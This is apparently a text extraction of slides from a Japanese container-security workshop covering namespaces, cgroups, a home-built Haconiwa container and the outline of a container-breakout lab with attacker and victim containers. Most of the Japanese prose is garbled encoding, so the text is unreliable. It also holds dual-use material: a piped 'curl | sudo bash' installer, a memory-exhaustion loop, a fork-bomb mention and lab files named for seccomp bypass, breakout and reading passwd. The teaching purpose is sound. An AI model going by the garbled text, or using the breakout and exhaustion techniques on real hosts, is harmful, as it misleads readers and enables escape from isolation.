コンテナのセキュリティを 中身から理解しよう / inside-out-container-and-its-security

օ͞Μ͸ɺVOTIBSF ͯ͠·͔͢ʁ ۙ౻Ӊஐ࿕৿ాߒฏ (.01FQBCP *OD ,ZVTIV4FDVSJUZ$POGFSFODF ίϯςφͷηΩϡϦςΟΛ  த਎͔Βཧղ͠Α͏

γχΞɾϓϦϯγύϧΤϯδχΞ ۙ౻ Ӊஐ࿕ / @udzura https://blog.udzura.jp/ Uchio Kondo ٕज़෦ ٕज़ج൫νʔϜ

LZVTFD

ຊ೔ͷखॱɺίʔυͳͲ IUUQTCJUMZLZVTFDQFQBCP

ΞδΣϯμ ίϯςφԾ૝ԽͬͯԿͩʁ ίϯςφͷ࢓૊ΈΛͷ͍ͧͯΈΑ͏  dখٳܜd ίϯςφʹର͢Δ߈ܸͷߟ͑ํ  dٳܜd
࣮ફʂίϯςφ߈ܸϫʔΫγϣοϓ ೉қ౓ॳڃ ೉қ౓ॳʙதڃ ೉қ౓தڃ ೉қ౓্ڃ☠

ίϯςφԾ૝ԽͬͯԿͩʁ j IUUQTqJDLSQHK%S;:

࣍ͷιϑτ΢ΣΞΛ ஌͍ͬͯΔํ ࢖ͬͨ͜ͱ͕͋Δํʁ

ࠓ೔ͷςʔϚ ίϯςφ

͍ΘΏΔԾ૝Խʢྫʣ ϋʔυ΢ΣΞ ϗετ04ϋΠύʔόΠβ IBSEXBSF FNVMBUJPO ήετ04 ϥΠϒϥϦ ϓϩάϥϜ IBSEXBSF FNVMBUJPO
ήετ04 ϥΠϒϥϦ ϓϩάϥϜ IBSEXBSF FNVMBUJPO ήετ04 ϥΠϒϥϦ ϓϩάϥϜ 04ͷػೳΛ ͦΕͧΕ४උ

ίϯςφܕʮԾ૝Խʯ ϋʔυ΢ΣΞ ϗετ04ʢ-JOVYʣ ίϯςφ Τϯδϯ ϥΠϒϥϦ ϓϩάϥϜ ίϯςφ Τϯδϯ ϥΠϒϥϦ
ϓϩάϥϜ ίϯςφ Τϯδϯ ϥΠϒϥϦ ϓϩάϥϜ 04ͷػೳ͸ ڞ௨Ͱ࢖͏

ίϯςφͷ࣮૷

୅දత࣮૷

ίϯςφͷϝϦοτ

ىಈ͕ΑΓߴ଎ɺܰྔ ϦιʔεΛࡉ੍͔͘ޚՄೳ ˠΫϥ΢υɺ*P5ʹ޲͍͍ͯΔ

ٯʹɺσϝϦοτ͸ʁ

෼཭͕͍ΘΏΔ7.ͱൺ΂ʮऑ͍ʯ 7.࡞੒͢ΔԾ૝Խ ϋΠύʔόΠβܕ ιϑτ΢ΣΞܕ ίϯςφܕԾ૝Խ ϛυϧ΢ΣΞͷதͰ ݖݶ෼཭͢ΔλΠϓ 7JSUVBM)PTU౳ ऑ͍▶ ◀ڧ͍
ݖݶ෼཭ ྑ͍▶ ◀ѱ͍ Ϧιʔεޮ཰ ʜʜ ʜʜ ʜʜ ʜʜ

ηΩϡϦςΟ ॏཁ

ίϯςφͷηΩϡϦςΟΛԡ͑͞Α͏ wίϯςφࣗମɺଞͷٕज़ͱൺ΂͘͝࠷ۙग़͖ͯͨ΋ͷͰ͋Δ w৘ใ΋ӡ༻࣮੷΋·ͩ·ͩগͳ͍ wͰ΋ɺࠓޙ͔ܽͤͳ͍ٕज़ʹͳΔͷͰɺηΩϡϦςΟΛ͔ͬ͠Γԡ͞ ͑ͯଞͷΤϯδχΞͱࠩΛ͚ͭ·͠ΐ͏ wʢ͚͍ͭͯΔͱ͸ݴ͍ͬͯͳ͍ʣ

ίϯςφͷ࢓૊ΈΛ ͷ͍ͧͯΈΑ͏ j IUUQTqJDLSQ3BTU

ϫʔΫγϣοϓ લ൒ ͷΞδΣϯμ %PDLFSͷΠϯετʔϧ ʮίϯςφ͸ϓϩηεʯͷ֬ೝ -JOVY/BNFTQBDFͷ֬ೝͱ࣮श
DHSPVQͷ֬ೝͱ࣮श ؆୯ͳίϯςφΛࣗ࡞ͯ͠Έ·͠ΐ͏ ҰॹʹखΛಈ͔ͭͭ͠ ݟͯΈ·͠ΐ͏ ϓϩάϥϛϯά ͯ͠Έ·͠ΐ͏ʂ ࠲ֶ w શମͷղઆ

ίϯςφ͸ Ͳ͏΍ͬͯ ίϯςφʹͳ͍ͬͯΔͷ͔ʁ

࣍ͷը໘Λ ݟͨ͜ͱ͕͋Δํʁ

-JOVYͰϓϩάϥϜΛಈ͔͍ͨ͠ʂ γΣϧ CBTIͳͲ -JOVY Χʔωϧ ϓϩάϥϜ ϓϩάϥϜ ࢦࣔ γεςϜ ίʔϧ
ϓϩηεͷ ࡞੒ ͓࢓ࣄ ܭࢉ 04

-JOVYͷʮϓϩηεʯ ਌ϓϩηε CBTIଞ ࢠϓϩηε ৽͍͠ ϓϩάϥϜ GPSL FYFDWF
XBJU

ίϯςφ͸ʮಛघͳϓϩηεʯ ਌ϓϩηε CBTIଞ ࢠϓϩηε ৽͍͠ ϓϩάϥϜ GPSL FYFDWF
XBJU 04ͷʮίϯςφԽػೳʯ ʢγεςϜίʔϧʣ

ʮಛघʯͱ͸ʁ

ී௨ͷϓϩηεͱίϯςφͷҧ͍ wίϯςφ͸ɺಛघͳϓϩηεͰ͋Δͱߟ͑ΒΕΔɻ w۩ମతʹ͸ɺ ϗετ͔Βಠཱͨ͠ϦιʔεۭؒΛ෇༩͠ɺ  ϗετ͔Βར༻Ͱ͖Δϋʔυ΢ΣΞϦιʔεͳͲʹ੍ݶΛ༩͑Δ  ͜ͱͰɺݸผʹಠཱͨ͠࡞ۀۭؒΛ֬อ͍ͯ͠ΔΠϝʔδ w ͷͨΊͷػೳͷ୅ද͕-JOVY/BNFTQBDFɺ 
ͷͨΊͷػೳͷ୅ද͕DHSPVQͰ͋Δɻ

ίϯςφͷͳ͍ੈքͷ04 ΈΜͳ͕޷͖উखʹ ࢓ࣄͷʮࡐྉʯΛ࢖ͬͯ͠·͏ ۠ผͳ͘࡞ۀΛ͢ΔͷͰ Ϳ͔ͭͬͨΓඇޮ཰ ͓࢓ࣄΛ͢Δਓ ʢϓϩηεʣ ࡐྉ ʢ04Ϧιʔεʣ $16
ϝϞϦ ˞ͬ͘͟Γͨ͠ྫ͑Ͱ͢

࡞ۀΛ҆શɾޮ཰Խ͢ΔͨΊ wʮ࡞ۀͷ෦԰ʯΛ෼͚Δඞཁ͕͋Δ

࡞ۀΛ҆શɾޮ཰Խ͢ΔͨΊ wʮ࡞ۀͷͨΊͷࡐྉͷׂΓৼΓʯ΋໌֬ʹ͍ͨ͠ άϧʔϓ" # $ άϧʔϓ" # $ " #
$

खΛಈ͔ͯ͠ ݟͯΈ·͠ΐ͏

൝෼͚ wਓ਺΋ଟ͍ͷͰɺʢࢀՃ͍ͨ͠ํ͸ʣͬ͘͟ΓલޙͷਓͨͪͰ൝Θ͚ ͱ͍͏ܗʹ͠·͢ɻ w٧Ίͯ࠲͍ͬͯͩ͘͞ʂ w൝ͷํʑͰɺڠྗ͋ͬͯ͠ਐΊͯΈ͍ͯͩ͘͞ɻ wͨ·ʹ౰ͯ·͢ɻ

%PDLFSͷΠϯετʔϧ

%PDLFSΛΠϯετʔϧ wʢࣄલΠϯετʔϧ͞Εͨํ͸লུՄೳͰ͢ʣ w͝४උ͍͍ͯͨͩͨ͠6CVOUV9FOJBMʹɺެࣜͷखॱͰEPDLFSDF ύοέʔδΛೖΕ͍ͯͩ͘͞ɻ w ˠIUUQTEPDTEPDLFSDPNJOTUBMMMJOVYEPDLFSDFVCVOUV w ΠϯετʔϧޙɺҎԼͷίϚϯυΛଧ͓ͬͯ͘ͱTVEP͕ෆཁʹͳָͬͯͰ͢ sudo gpasswd
-a vagrant docker

ʮίϯςφ͸ϓϩηεʯ ͷ֬ೝ

%PDLFS্ͰBQBDIFΛಈ͔ͦ͏ FROM ubuntu:xenial ENV DEBIAN_FRONTEND noninteractive RUN apt-get -q -y
update && apt-get -q -y install apache2 EXPOSE 80 CMD ["/usr/sbin/apache2ctl", "-D", "FOREGROUND"] $ docker build -t kyusec-1 udzura/section-2 wҎԼͷΑ͏ʹ%PDLFSpMFΛ࡞੒͢Δ TBNQMF%PDLFSpMF wҎԼͷΑ͏ʹJNBHFΛϏϧυ͢Δ

ίϯςφΛ্ཱͪ͛Δ $ docker run -p 8080:80 -d kyusec-1 $ curl
localhost:8080 -s | grep '<title>' <title>Apache2 Ubuntu Default Page: It works</title> wҎԼͰBQBDIFͷίϯςφ্ཱ͕͕ͪΓɺΞΫηεͰ͖Δɻ

Ұॹʹ΍ͬͯΈΑ͏ $ ps auxf wB ࣍ͷίϚϯυͰEPDLFS͕࡞ΔϓϩηεπϦʔΛ֬ೝ͠Α͏ $ sudo apt-get install
apache2 && systemctl start apache2 wC ϗετͰ௚઀BQBDIFΛ্ཱͪ͛ͯΈΔɻ  ɹϓϩηεπϦʔΛൺֱ͠Α͏

-JOVY/BNFTQBDF

ʮ෦԰ʯͷଘࡏΛ ֬ೝ͠Α͏

-JOVY/BNFTQBDFΛʮ؍࡯ʯ͢Δ $ docker ps CONTAINER ID IMAGE COMMAND ... NAMES
88b7e296fe92 kyusec-1 "/usr/sbin/apache2..." ... angry_rosalind $ docker exec -ti 88b7e296fe92 bash wઌ΄Ͳ্ཱͪ͛ͨίϯςφͷ*%Λ֬ೝ͠ɺʮΞλονʯ͢Δ # ip a wͦͷঢ়ଶͰίϯςφ಺෦ͷωοτϫʔΫΛ֬ೝ͢Δ wͦͷωοτϫʔΫͱɺϗετͷωοτϫʔΫΛൺֱ͢Δɻ # exit $ ip a

ίϯςφͷதɺಠཱͨ͠ωοτϫʔΫ͕͋Δ wઌ΄Ͳ֬ೝͨ͠Α͏ʹίϯςφ͸ಉ͡Ϛγϯʹ͋Δϓϩηεɻ  ʹ΋͔͔ΘΒͣɺಠཱͨ͠ωοτϫʔΫׂ͕Γ౰͍ͨͬͯΔɻ

/BNFTQBDF͸ଞʹ΋͋Δ w͍ͭͮͯɺϗετ໊΋ಠཱ͍ͯ͠Δ͜ͱΛ֬ೝ͠Α͏  ίϯςφ಺෦ͷϗετ໊΋มߋͯ͠ΈΑ͏ $ docker exec -ti 88b7e296fe92 hostname $
hostname

/BNFTQBDF͸ଞʹ΋͋Δ wϓϩηεʹ͸ϓϩηε*%ʢ1*%ʣ͕͋Δ͕ɺ  ͦͷ࠾൪͕ʮಠཱ͍ͯ͠Δʯ͜ͱΛݟͯΈΑ͏ wಉ͡ϓϩηεʹҧ͏1*%ׂ͕ΓৼΒΕ͍ͯΔ͜ͱΛ֬ೝ͠Α͏ $ docker exec -ti 88b7e296fe92 ps
auxf $ ps auxf

/BNFTQBDF͸ Ͳ͜Ͱ֬ೝͰ͖Δʁ

Ұॹʹ΍ͬͯΈΑ͏ $ ps auxf | grep -A 6 docker[d] #
ώϯτͱͳΔίϚϯυ wB ίϯςφͷʮϗετ͔Βݟͨʯ1*%Λಥ͖ࢭΊΑ͏ɻ $ sudo ls -l /proc/$PID/ns # $PID ͸ίϯςφͷPID wC QSPDGTʹ͍ͭͯௐ΂ɺҎԼͷσΟϨΫτϦΛ֬ೝ͠Α͏ $ sudo ls -l /proc/self/ns wD ϗετͷQSPD1*%OTͱͲ͏ҧ͏͔ɺ໨EJ⒎͠Α͏

Ұॹʹ΍ͬͯΈΑ͏ ଓ͖ $ sudo nsenter --net -t $PID wE ωοτϫʔΫ໊લۭؒʮͷΈʯʹΞλονͯ͠ΈΑ͏ɻ 
ɹΞλονޙɺҎԼΛ֬ೝ͠Α͏  ɹE ip aͷ࣮ߦ݁Ռ͸ϗετEPDLFSͱൺ΂Ͳ͏͔ʁ  ɹE hostnameͷ࣮ߦ݁Ռ͸Ͳ͏͔ʁ wˠ෦԰ʹ͸͞Βʹ಺෦Ͱͷʮ෼ྨʯ͕͋Δ

DHSPVQ

ʮ࢓ࣄͷࡐྉʯ͸ ͲͷΑ͏ʹׂΓৼΒΕΔʁ

Ұॹʹ΍ͬͯΈΑ͏ $ CID=$(docker inspect -f '{{.ID}}' 88b7e296fe92) $ sudo cat
/sys/fs/cgroup/memory/docker/$CID/memory.usage_in_bytes $ sudo cat /sys/fs/cgroup/memory/docker/$CID/memory.limit_in_bytes wB ͖ͬ͞ͷίϯςφͷʮϝϞϦͷׂΓ౰ͯʯΛ֬ೝ͠Α͏ wC ΑΓɺׂΓ౰ͯͷগͳ͍ίϯςφΛ࡞Γɺൺֱ͠Α͏ $ CID2=$(docker run --memory=4m -d kyusec-1); echo $CID2 $ sudo cat /sys/fs/cgroup/memory/docker/$CID2/memory.usage_in_bytes $ sudo cat /sys/fs/cgroup/memory/docker/$CID2/memory.limit_in_bytes

͞Βʹ΍ͬͯΈΑ͏ $ docker exec -ti $CID bash $ docker exec
-ti $CID2 bash wD ϝϞϦׂΓ౰੍ͯݶͳ͠ɺ੍ݶ͋ΓɺͷίϯςφʹͦΕͧΕೖΓɺ  BQUͳͲͷૢ࡞Λͯ͠ɺͲͪΒ͕ڍಈ͕஗͍͔ൺֱͯ͠ΈΑ͏ wE ௚઀ϝϞϦͷׂΓ౰ͯΛมߋ͠ɺϝϞϦṧഭతͳڍಈ͕  վળ͢Δ͜ͱΛ֬ೝͯ͠ΈΑ͏ $ echo '128m' | sudo tee /sys/fs/cgroup/memory/docker/$CID2/memory.limit_in_bytes $ docker exec -ti $CID2 bash root@ebb02470253b:/# apt install ruby ...

͞Βʹ΍ͬͯΈΑ͏ Ԡ༻ฤ $ sudo mkdir /sys/fs/cgroup/memory/kyusec-2 $ sudo ls -l
/sys/fs/cgroup/memory/kyusec-2 $ echo 0 | sudo tee /sys/fs/cgroup/memory/kyusec-2/memory.swappiness $ echo 4m | sudo tee /sys/fs/cgroup/memory/kyusec-2/memory.limit_in_bytes $ echo $$ | sudo tee /sys/fs/cgroup/memory/kyusec-2/tasks $ ruby -e \ 'GC.disable;ha=Hash.new;loop{1000.times{ha[rand(2**20).to_s.to_sym]=rand(2**20).to_s.to_sym}}' $ echo 1g | sudo tee /sys/fs/cgroup/memory/kyusec-2/memory.limit_in_bytes # ׂΓ౰ͯΛม͑Δ $ ruby -e \ 'GC.disable;ha=Hash.new;loop{1000.times{ha[rand(2**20).to_s.to_sym]=rand(2**20).to_s.to_sym}}' # ଈࢮ͠ͳ͍͜ͱ͕֬ೝͰ͖Δ wF DHSPVQΛࣗ෼Ͱ࡞ͬͯɺ஋Ληοτͯ͠ΈΔɻ  ͦͷ؀ڥͰ00.,JMMFSΛൃಈͤͯ͞ΈΑ͏

DHSPVQͰίϯτϩʔϧͰ͖ΔϦιʔε w$16ɺϝϞϦɺσΟεΫ*0ͷଳҬɺϓϩηε਺ɺͳͲ  w௥Ճ՝୊QJETDPOUSPMMFSΛར༻͠ɺίϯςφ಺෦ͰͷʮGPSLCPNCʯ Λ๷͍ͰΈΑ͏ɻ  ʢ͕࣌ؒ͋Ε͹ɺҰॹʹσϞΛ΍ͬͯΈ·͢ʣ

؆୯ͳίϯςφΛ ࣗ࡞ͯ͠ΈΑ͏

ࣄલ४උ)BDPOJXBͷΠϯετʔϧ $ curl -s https://packagecloud.io/install/repositories/udzura/haconiwa/script.deb.sh \ | sudo bash $
sudo apt-get install haconiwa=0.10.0~alpha2-1 $ haconiwa version haconiwa: v0.10.0.alpha2 w)BDPOJXB!VE[VSBΒʹΑΓ։ൃ͞ΕͨɺNSVCZͰ  ઃఆ΍ϑοΫΛهड़Ͱ͖Δ-JOVYίϯςφϥϯλΠϜɻ w6CVOUVʹWFSTJPOBMQIBΛೖΕΑ͏ IUUQTQBDLBHFDMPVEJPVE[VSBIBDPOJXB

ࣄલ४උΠϝʔδʢSPPUGTʣΛ࡞Δ $ sudo mkdir -p /tmp/haconiwa/kyusec-3 $ docker export 88b7e296fe92
| \ sudo tar -xv -f - -C /tmp/haconiwa/kyusec-3 $ sudo chroot /tmp/haconiwa/kyusec-3 root@localhost:/# ls -l / total 76 drwxr-xr-x 2 root root 4096 Sep 25 07:52 bin drwxr-xr-x 2 root root 4096 Apr 12 2016 boot drwxr-xr-x 4 root root 4096 Sep 25 07:53 dev ...

؆୯ͳίϯςφΛ࡞ͬͯΈΑ͏ $ sudo haconiwa init --bridge; haconiwa init kyusec-3.haco #
ҎԼͷߦΛ௥Ճɺฤू Haconiwa.define do |config| #... config.init_command = ["/usr/sbin/apache2ctl", "-D", "FOREGROUND"] #... root = Pathname.new("/tmp/haconiwa/kyusec-3") #... config.network.container_ip = "10.0.0.10" config.network.namespace = config.name  #... config.capabilities.allow "cap_net_bind_service" config.capabilities.allow "cap_kill" end

ىಈͯ͠ΈΑ͏ $ sudo haconiwa run kyusec-3.haco Create lock: #<Lockfile path=/var/lock/.haconiwa-902340a9.hacolock>
Container fork success and going to wait: pid=10494 AH00557: apache2: apr_sockaddr_info_get() failed for haconiwa-902340a9 AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1. Set the 'ServerName' directive globally to suppress this message ## ผλʔϛφϧͰ $ curl -s 10.0.0.10 | grep '<title>' <title>Apache2 Ubuntu Default Page: It works</title>

εΫϥονͰ ࡞ͬͯΈΑ͏

IBDPSCIBDPJSCίϚϯυ $ hacorb --version mruby 1.4.0 (2018-1-16) $ hacoirb mirb
- Embeddable Interactive Ruby Shell > puts Dir.pwd /home/vagrant => nil

$POUBJOFS 1SPHSBNNJOH ೖ໳

Ұॹʹ 3VCZͷίʔυΛ ॻ͍ͯΈ·͢ʢWJNͰʣ

·ͣ͸ɺGPSLFYFDDISPPU͢Δ͚ͩ pid = Process.fork do Dir.chroot "/tmp/haconiwa/kyusec-3" Dir.chdir "/" Exec.execve
ENV, "/usr/sbin/apache2ctl", "-D", "FOREGROUND" end p(Process.waitpid2 pid) $ sudo hacorb udzura/section-2/mycon.rb AH00557: apache2: apr_sockaddr_info_get() failed for localhost ... # ผλʔϛφϧ $ curl localhost -s | grep title <title>Apache2 Ubuntu Default Page: It works</title> [udzura/section-2/mycon.rb]

ωοτϫʔΫͷ४උ $ sudo ip netns add kyusec-3-demo $ sudo ip
link add kyusec-3-host type veth peer name kyusec-3-guest $ sudo brctl addif haconiwa0 kyusec-3-host $ sudo ip link set kyusec-3-guest netns kyusec-3-demo up $ sudo ip link set kyusec-3-host up $ sudo ip netns exec kyusec-3-demo ip link set lo up $ sudo ip netns exec kyusec-3-demo ip addr add 10.0.0.20/24 dev kyusec-3-guest $ ping 10.0.0.20

/BNFTQBDFΛಠཱͤ͞Δ --- sample1/mycon.rb.rev1 2018-09-25 23:27:55.342689233 -0700 +++ sample1/mycon.rb 2018-09-25 23:30:32.719900439
-0700 @@ -1,4 +1,8 @@ pid = Process.fork do + Namespace.setns( + Namespace::CLONE_NEWNET, + fd: File.open("/var/run/netns/kyusec-3-demo", 'r').fileno + ) Dir.chroot "/tmp/haconiwa/kyusec-3" Dir.chdir "/" Exec.execve ENV, "/usr/sbin/apache2ctl", "-D", "FOREGROUND" $ curl localhost curl: (7) Failed to connect to localhost port 80: Connection refused $ curl 10.0.0.20 -s | grep title <title>Apache2 Ubuntu Default Page: It works</title> [udzura/section-2/mycon.rb] diff

DHSPVQͰϝϞϦ੍ݶΛ͢Δ --- sample1/mycon.rb.rev2 2018-09-25 23:33:37.330883578 -0700 +++ sample1/mycon.rb 2018-09-25 23:37:44.894926446
-0700 @@ -1,4 +1,9 @@ +limit = ENV['MEMORY_LIMIT'] || "128m" pid = Process.fork do + Dir.mkdir "/sys/fs/cgroup/memory/kyusec-3-demo" rescue nil + system "echo 0 > /sys/fs/cgroup/memory/kyusec-3-demo/memory.swappiness" + system "echo #{limit} > /sys/fs/cgroup/memory/kyusec-3-demo/memory.limit_in_bytes" + system "echo #{Process.pid} > /sys/fs/cgroup/memory/kyusec-3-demo/tasks" Namespace.setns( Namespace::CLONE_NEWNET, fd: File.open("/var/run/netns/kyusec-3-demo", 'r').fileno $ sudo hacorb udzura/section-2/mycon.rb $ sudo env MEMORY_LIMIT='1m' hacorb udzura/section-2/mycon.rb # ൺֱ͠Α͏ [udzura/section-2/mycon.rb] diff

εΫϦϓτશମ limit = ENV['MEMORY_LIMIT'] || "128m" pid = Process.fork do
Dir.mkdir "/sys/fs/cgroup/memory/kyusec-3-demo" rescue nil system "echo 0 > /sys/fs/cgroup/memory/kyusec-3-demo/memory.swappiness" system "echo #{limit} > /sys/fs/cgroup/memory/kyusec-3-demo/memory.limit_in_bytes" system "echo #{Process.pid} > /sys/fs/cgroup/memory/kyusec-3-demo/tasks" Namespace.setns( Namespace::CLONE_NEWNET, fd: File.open("/var/run/netns/kyusec-3-demo", 'r').fileno ) Dir.chroot "/tmp/haconiwa/kyusec-3" Dir.chdir "/" Exec.execve ENV, "/usr/sbin/apache2ctl", "-D", "FOREGROUND" end p(Process.waitpid2 pid) [sample/mycon.rb] all

͜͜·Ͱͷ·ͱΊ wίϯςφ͸ɺ04͔ΒݟΔͱ௨ৗͷϓϩηεͰ͋Δ w04ͷίϯςφԽͷػೳΛ૊Έ߹ΘͤͯɺϓϩηεͷಠཱੑΛߴΊɺ ಠࣗʹϦιʔεΛׂΓ౰ͯͯɺ7.ͷΑ͏ʹ࢖͏͜ͱ͕Ͱ͖Δ wίϯςφԽͷػೳ͸ͨ͘͞Μ͋Δ wجຊʮγεςϜίʔϧʯͰ͋ΔͷͰɺϓϩάϥϛϯάͰ͍͡ΕΔ

ίϯςφʹର͢Δ߈ܸͷߟ͑ํ j IUUQTqJDLSQ-UJ

ίϯςφͷத਎͸׬શʹཧղͨ͠ w͋ΒͨΊ্͔ͯΒԼ·ͰோΊͯΈΑ͏

VE[VSB!84"ݚͷࢿྉΑΓ IUUQTVE[VSBIBUFOBCMPHKQFOUSZ

ͲͷΑ͏ͳ؍఺Ͱ ߈ܸରࡦΛߟ͑Ε͹ྑ͍͔

04Χʔωϧࣗମͷ੬ऑੑΛͭ͘

04Χʔωϧࣗମͷ੬ऑੑΛͭ͘ wίϯςφ͸ҰൠͷϓϩηεͷଐੑΛมߋ࣮ͯ͠ݱ͞ΕΔɻ͢ͳΘͪɺ ϗετ04͔ΒݟΔͱ௨ৗͷϓϩηεʹա͗ͳ͍ɻ wΑͬͯɺϗετ04Χʔωϧʹ੬ऑੑ͕͋ΔͱɺͦͷӨڹΛड͚Δɻ wྫΧʔωϧΤΫεϓϩΠτݖݶঢ֨Ͱݟ͑ͳ͍΋ͷ͕ݟ͑ͯ͠·͏ wྫ%P4ίϯςφͷத͔ΒɺϗετͷՄ༻ੑʹӨڹΛ༩͑ΔͱɺϗεςΟ ϯάͷ৔߹ͳͲʹଞͷϢʔβʹӨڹΛ༩͑ͯ͠·͏

':*$POUBJOFS0QUJNJ[FE04 w(,&ͷྫ w IUUQTDMPVEHPPHMFDPNDPOUBJOFSPQUJNJ[FEPTEPDTDPODFQUTTFDVSJUZ IMKB wϛυϧ΢ΣΞɺϢʔβɺΧʔωϧΦϓγϣϯͳͲΛ࠷௿ݶͷઃఆʹ͠ ͍ͯΔɻ͜ΕʹΑΓɺߋ৽Λ༰қʹ͢Δɺ༨ܭͳ߈ܸΛड͚ͮΒ͘͢ ΔɺͳͲଟ͘ͷϝϦοτ͕͋Δ

ίϯςφԽͷػೳͷෆඋɺൈ͚݀Λͭ͘

ίϯςφԽͷػೳͷෆඋɺൈ͚݀Λͭ͘ wίϯςφ͸ɺઆ໌ͨ͠௨Γɺ͍͔ͭ͘ͷݖݶ෼཭ɺಠཱԽͷͨΊͷػ ೳͷ૊Έ߹ΘͤͰ͋Δɻ w͜ΕΒͷػೳͷཧղ͕؁͍ͱɺෆ༻ҙʹઃఆΛ؇࿨ͯ͠͠·͍߈ܸʹ ͭͳ͕Δ৔߹͕͋Δ w FHdocker run --privileged wݪଇͱͯ͠ίϯςφଆͰ๷͙΂͖ʮ݀ʯΛ๷͍͛ͯͳ͔ͬͨ৔߹΋͋
Δɻ͜Ε͸ϥϯλΠϜଆͷ੬ऑੑͱͳͬͯ͠·͏ w FHίϯςφ಺෦͔Βͷ/proc/acpi΁ͷ߈ܸͷྫ https://jvndb.jvn.jp/ja/contents/2018/JVNDB-2018-007686.html

*OUSPEVDUJPOUP$POUBJOFS4FDVSJUZ w%PDLFSެࣜͷɺηΩϡϦςΟ؍఺͔Βͷίϯςφػೳͷղઆɻ wࠓ೔࿩ͨ͠Α͏ͳ಺༰͕ৄ͘͠ࡌ͍ͬͯΔ w IUUQTXXXEPDLFSDPNTJUFTEFGBVMUpMFT81@*OUSPUP$POUBJOFS4FDVSJUZ@QEG wۙ౻͏͓ͪ͞ΜͷࢿྉͰ΋·ͱΊ͍ͯΔɻࢀরͷ͜ͱ w IUUQTVE[VSBIBUFOBCMPHKQFOUSZ

ωοτϫʔΫͳͲͷઃఆෆඋΛͭ͘

ωοτϫʔΫͳͲͷઃఆෆඋΛͭ͘ wίϯςφಉ࢜͸ɺෳ਺ͷίϯςφΛ૊Έ߹Θͤͯར༻͢Δͷ͕ී௨ wͦͷͨΊʢΫϥ΢υϓϥοτϑΥʔϜͳͲಉ༷ʣΞΫηεݖݶͷઃఆ Λ͢Δඞཁ͕͋ΔɻDGηΩϡϦςΟάϧʔϓ wωοτϫʔΫతͳ΋ͷͰ͸ w ,VCFSOFUFTͷɺ3#"$ϕʔεͷωοτϫʔΫ੍ݶ w αʔϏεϝογϡͷಋೖΑΔΞΫηε੍ݶɺྲྀྔ੍ݶ w
DHSPVQͷOFU@DMTίϯτϩʔϥʴUDJQUBCMFT

':*αʔϏεϝογϡ w ϩάɺΞΫηείϯτϩʔϧɺτϨʔγϯάͳͲͷϏδωεϩδοΫ͔Β཭Εͨ໰୊ ΛɺίϯςφؒͷωοτϫʔΫ૚Ͱղܾ͢Δߟ͑ํɻ w ྫ͑͹αΠυΧʔίϯςφʢίϯςφʹ෇ଐ͢ΔίϯςφʣͳͲʹϓϩΫγΛཱͯɺ ͢΂ͯͷ)551ΞΫηεΛܦ༝ͤ͞Δ͜ͱͰɺωοτϫʔΫϨϕϧͰͷΞΫηε੍ݶ ΍ྲྀྔ੍ޚΛ͓͜ͳ͏ɻ IUUQTCMPHFOWPZQSPYZJPTFSWJDFNFTIEBUBQMBOFWTDPOUSPMQMBOFFGGD

ʢΞϓϦέʔγϣϯࣗମͷ੬ऑੑΛͭ͘ʣ ˞͜ͷ৔߹ɺҰൠͷΞϓϦέʔγϣϯʹ͋Δ੬ऑੑͱಉ༷ͷٞ࿦ͱͳΔɻলུ

':*εΠενʔζϞσϧ wίϯςφʹؔ͢ΔηΩϡϦςΟػߏ͸ɺҰ෦ػೳͱͯ͠ॏෳ͍ͯ͠Δ ΋ͷ΋͋ΔʢFY$BQBCJMJUZͱTFDDPNQͷ྆ํͰɺDISPPUૢ࡞Λې ࢭͰ͖ΔͳͲʣ wҰํͰɺෳ਺ͷػߏΛ༻͍ͯૢ࡞Λ੍ݶ͢Δ͜ͱͰɺ͋Δػೳ͕੬ऑ ੑͳͲͰόΠύε͞Εͯ͠·ͬͯ΋ɺผͷػೳͰ߈ܸΛ๷͙؇࿨͢Δ ͜ͱ͕Ͱ͖Δ

࣮ફʂ ίϯςφ߈ܸϫʔΫγϣοϓ j IUUQTqJDLSQDH+/

!NSUDʹότϯλον

#SFBLPVU GSPN $POUBJOFS IUUQTqJDLSQCIWS7

ΤϯδχΞ ৿ాߒฏ@mrtc0 ηΩϡϦςΟରࡦࣨ https://blog.ssrf.in/

४උ $ vagrant up $ vagrant ssh vagrant@ubuntu-xenial:~/$ cd files
vagrant@ubuntu-xenial:~/files$ ls apparmor bypass_seccomp.c sample1.haco sample3.haco breakout.c read_passwd.c sample2.haco sample4.haco

ԋशʹ͍ͭͯ wԋश͸ίϐϖͰͰ͖ΔΑ͏ʹ؆୯ͳνʔτγʔτΛ༻ҙ͍ͯ͠·͢ •https://github.com/pepabo/kyusec-container •https://bit.ly/2OXu7qc wԋशίϚϯυʹ͍ͭͯ wԋश಺༰͕εϥΠυҰຕʹऩ·Βͳ͍ͷͰɺ࠷ॳʹԋशͷ಺༰ͷखॱΛ঺հ͠ ͨ͋ͱʹɺd෼΄Ͳ࣌ؒΛऔͬͯօ͞ΜʹԋशΛͯ͠΋Β͍·͢ wۙ͘ͷਓͱ࿩͠ͳ͕Β΍͍͍ͬͯͨͩͯߏ͍·ͤΜ

ίϚϯυͰͷૢ࡞ʹ͍ͭͯ wϗετ WBHSBOU ͱίϯςφΛߦ͖དྷ͠·͢ wλʔϛφϧΛෳ਺ىಈͯ͠ɺͦΕͧΕͰvagrant ssh͓ͯ͘͠ͱศརͰ͢ $ ↑ Host ͸ϗετͰͷૢ࡞Ͱ͢
Host $ ↑ Container ͸ίϯςφͰͷૢ࡞Ͱ͢ Container

)BDPOJXB • *.haco ͕ίϯςφͷઃఆΛهड़ͨ͠ϑΝΠϧͰ͢ $ sudo haconiwa start sample1.haco Create
lock: #<Lockfile path=/var/lock/.sample1.hacolock> Container fork success and going to wait: pid=9816 root@sample1:/# ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.3 18208 3324 pts/3 S 09:18 0:00 /bin/bash root 14 0.0 0.2 34424 2824 pts/3 R+ 09:19 0:00 ps aux Host

-9$ • attacker ͱ victim ͱ͍͏ίϯςφ͕͋Δ͜ͱΛ֬ೝ $ lxc list …
attacker | RUNNING | 10.152.207.88 (eth0) victim | RUNNING | 10.152.207.51 (eth0) … Host

#SFBLPVU GSPN $POUBJOFS

